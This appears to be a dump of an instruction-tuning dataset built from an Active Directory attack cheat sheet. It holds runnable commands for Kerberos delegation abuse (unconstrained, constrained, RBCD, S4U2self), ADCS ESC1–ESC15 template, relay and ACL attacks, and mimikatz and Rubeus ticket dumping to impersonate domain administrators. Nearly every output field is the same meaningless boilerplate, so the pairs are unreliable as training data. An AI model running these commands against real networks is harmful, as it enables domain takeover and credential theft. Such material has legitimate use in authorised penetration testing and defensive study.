instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
Find delegation
MATCH (c:User {unconstraineddelegation:true}) RETURN c
Note or procedural step under 'Find delegation'.
Find delegation
Constrained
Note or procedural step under 'Find delegation'.
Find delegation
MATCH p=((c:Base)-[:AllowedToDelegate]->(t:Computer)) RETURN p
Note or procedural step under 'Find delegation'.
Find delegation
MATCH p=shortestPath((u:User)-[*1..]->(c:Computer {name: "<MYTARGET.FQDN>"})) RETURN p
Note or procedural step under 'Find delegation'.
Unconstrained delegation
UAC: ADS_UF_TRUSTED_FOR_DELEGATION
Note or procedural step under 'Unconstrained delegation'.
Unconstrained delegation
Force connection with coerce
Note or procedural step under 'Unconstrained delegation'.
Unconstrained delegation
Get tickets
Note or procedural step under 'Unconstrained delegation'.
Unconstrained delegation
mimikatz privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Unconstrained delegation
Rubeus.exe dump /service:krbtgt /nowrap
Tool or command referenced under 'Unconstrained delegation'.
Unconstrained delegation
Rubeus.exe dump /luid:0xdeadbeef /nowrap
Tool or command referenced under 'Unconstrained delegation'.
Unconstrained delegation
Rubeus.exe monitor /interval:5
Tool or command referenced under 'Unconstrained delegation'.
Constrained delegation
With protocol transition (any) UAC: TRUST_TO_AUTH_FOR_DELEGATION
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Get TGT for user
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Request S4u2self
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Request S4u2proxy
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Rubeus.exe hash /password:<password>
Tool or command referenced under 'Constrained delegation'.
Constrained delegation
Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<AES 256 hash>
Tool or command referenced under 'Constrained delegation'.
Constrained delegation
Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<admin_user> /msdsspn:<spn_constrained> /altservice:<altservice> /ptt
Tool or command referenced under 'Constrained delegation'.
Constrained delegation
Altservice HTTP/HOST/CIFS/LDAP
Note or procedural step under 'Constrained delegation'.
Constrained delegation
getST.py -spn '<spn>/<target>' -impersonate Administrator -dc-ip '<dc_ip>' '<domain>/<user>:<password>' -altservice <altservice>
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Altservice HTTP/HOST/CIFS/LDAP
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Without protocol transition (kerberos only) UAC: TRUSTED_FOR_DELEGATION
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Constrain between Y and Z
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Add computer X
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Add RBCD : delegate from X to Y
Note or procedural step under 'Constrained delegation'.
Constrained delegation
s4u2self X (impersonate admin)
Note or procedural step under 'Constrained delegation'.
Constrained delegation
S4u2Proxy X (impersonate admin on spn/Y)
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Forwardable TGS for Y
Note or procedural step under 'Constrained delegation'.
Constrained delegation
S4u2Proxy Y (impersonate admin on spn/Z)
Note or procedural step under 'Constrained delegation'.
Constrained delegation
add computer account
Note or procedural step under 'Constrained delegation'.
Constrained delegation
addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>'
Note or procedural step under 'Constrained delegation'.
Constrained delegation
RBCD With added computer account
Note or procedural step under 'Constrained delegation'.
Constrained delegation
rbcd.py -delegate-from '<rbcd_con>$' -delegate-to '<constrained>$' -dc-ip '<dc>' -action 'write' -hashes '<hash>' <domain>/<constrained>$
Note or procedural step under 'Constrained delegation'.
Constrained delegation
getST.py -spn host/<constrained> -impersonate Administrator --dc-ip <dc_ip> '<domain>/<rbcd_con>$:<rbcd_conpass>'
Note or procedural step under 'Constrained delegation'.
Constrained delegation
getST.py -spn <constrained_spn>/<target> -hashes '<hash>' '<domain>/<constrained>$' -impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket>
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Self RBCD
Note or procedural step under 'Constrained delegation'.
Constrained delegation
Like RBCD without add computer
Note or procedural step under 'Constrained delegation'.
Resource-Based Constrained Delegation
add computer account
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>'
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
RBCD With added computer account
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
Rubeus.exe hash /password:<computer_pass> /user:<computer> /domain:<domain>
Tool or command referenced under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
Rubeus.exe s4u /user:<fake_computer$> /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/<victim.domain.local> /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
Tool or command referenced under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
rbcd.py -delegate-from '<computer>$' -delegate-to '<target>$' -dc-ip '<dc>' -action 'write' <domain>/<user>:<password>
Note or procedural step under 'Resource-Based Constrained Delegation'.
Resource-Based Constrained Delegation
getST.py -spn host/<dc_fqdn> '<domain>/<computer_account>:<computer_pass>' -impersonate Administrator --dc-ip <dc_ip> #Kerberos TGT
Note or procedural step under 'Resource-Based Constrained Delegation'.
S4U2self abuse
Get machine account (X)'s TGT
Note or procedural step under 'S4U2self abuse'.
S4U2self abuse
Get a ST on X as user admin
Note or procedural step under 'S4U2self abuse'.
S4U2self abuse
getTGT.py -dc-ip "<dc_ip>" -hashes :"<machine_hash>" "<domain>"/"<machine>$"
Note or procedural step under 'S4U2self abuse'.
S4U2self abuse
getST.py -self -impersonate "<admin>" -altservice "cifs/<machine>" -k -no-pass -dc-ip "DomainController" "<domain>"/'<machine>$' #Admin
Note or procedural step under 'S4U2self abuse'.
Enumeration
certutil -v -dsTemplate
Note or procedural step under 'Enumeration'.
Enumeration
certify.exe find [ /vulnerable]
Note or procedural step under 'Enumeration'.
Enumeration
certipy find -u <user>@<domain> -p <password> -dc-ip <dc_ip>
Note or procedural step under 'Enumeration'.
Enumeration
ldeep ldap -u <user> -p <password> -d <domain> -s <dc_ip> templates
Note or procedural step under 'Enumeration'.
Enumeration
Get PKI objects information
Note or procedural step under 'Enumeration'.
Enumeration
certify.exe pkiobjects
Note or procedural step under 'Enumeration'.
Enumeration
Display CA information
Note or procedural step under 'Enumeration'.
Enumeration
certutil -TCAInfo
Note or procedural step under 'Enumeration'.
Enumeration
certify.exe cas
Note or procedural step under 'Enumeration'.
Web Enrollment Is Up
ESC8
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
Tool or command referenced under 'Web Enrollment Is Up'.
Web Enrollment Is Up
gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file>
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
certipy relay -target http://<ip_ca>
Note or procedural step under 'Web Enrollment Is Up'.
Web Enrollment Is Up
certipy auth -pfx <certificate> -dc-ip <dc_ip>
Note or procedural step under 'Web Enrollment Is Up'.
Misconfigured Certificate Template
ESC1
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -upn <target_user>@<domain>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" [/altname:"Admin"]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC2
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC3
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC3
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>"
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request request /ca:<server>\<ca-name> /template:<template> /onbehalfof:<domain>\<user> /enrollcert:<path.pfx> [/enrollcertpw:<cert-password>]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC13
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>"
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
ESC15
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> -upn <target_user>@<domain> --application-policies 'Client Authentication' #[PR 228]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> --application-policies 'Certificate Request Agent' # [PR 228]
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured Certificate Template
certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -on-behalf-of '<domain>\<user>' -pfx <cert>
Note or procedural step under 'Misconfigured Certificate Template'.
Misconfigured ACL
ESC4
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
write privilege over a certificate template
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -save-old -debug
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
ESC1
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
restore template
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -configuration <template>.json
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
ESC7
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
Manage CA
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy ca -ca <ca_name> -add-officer '<user>' -username <user>@<domain> -password <password> -dc-ip <dc_ip> -target-ip <target_ip>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
ESC7 Manage certificate
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
Manage certificate
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy ca -ca <ca_name> -enable-template '<ecs1_vuln_template>' -username <user>@<domain> -password <password>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy req -username <user>@<domain> -password <password> -ca <ca_name> -template '<vulnerable template name>' -upn '<target_user>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
error, but save private key and get issue request
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
Issue request
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy ca -u <user>@<domain> -p '<password>' -ca <ca_name> -issue-request <request_id>
Note or procedural step under 'Misconfigured ACL'.
Misconfigured ACL
certipy req -u <user>@<domain> -p '<password>' -ca <ca_name> -retreive <request_id> #Pass the certificate
Note or procedural step under 'Misconfigured ACL'.
Vulnerable PKI Object access control
ESC5
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
Vulnerable acl on PKI
Note or procedural step under 'Vulnerable PKI Object access control'.
Vulnerable PKI Object access control
ACL
Note or procedural step under 'Vulnerable PKI Object access control'.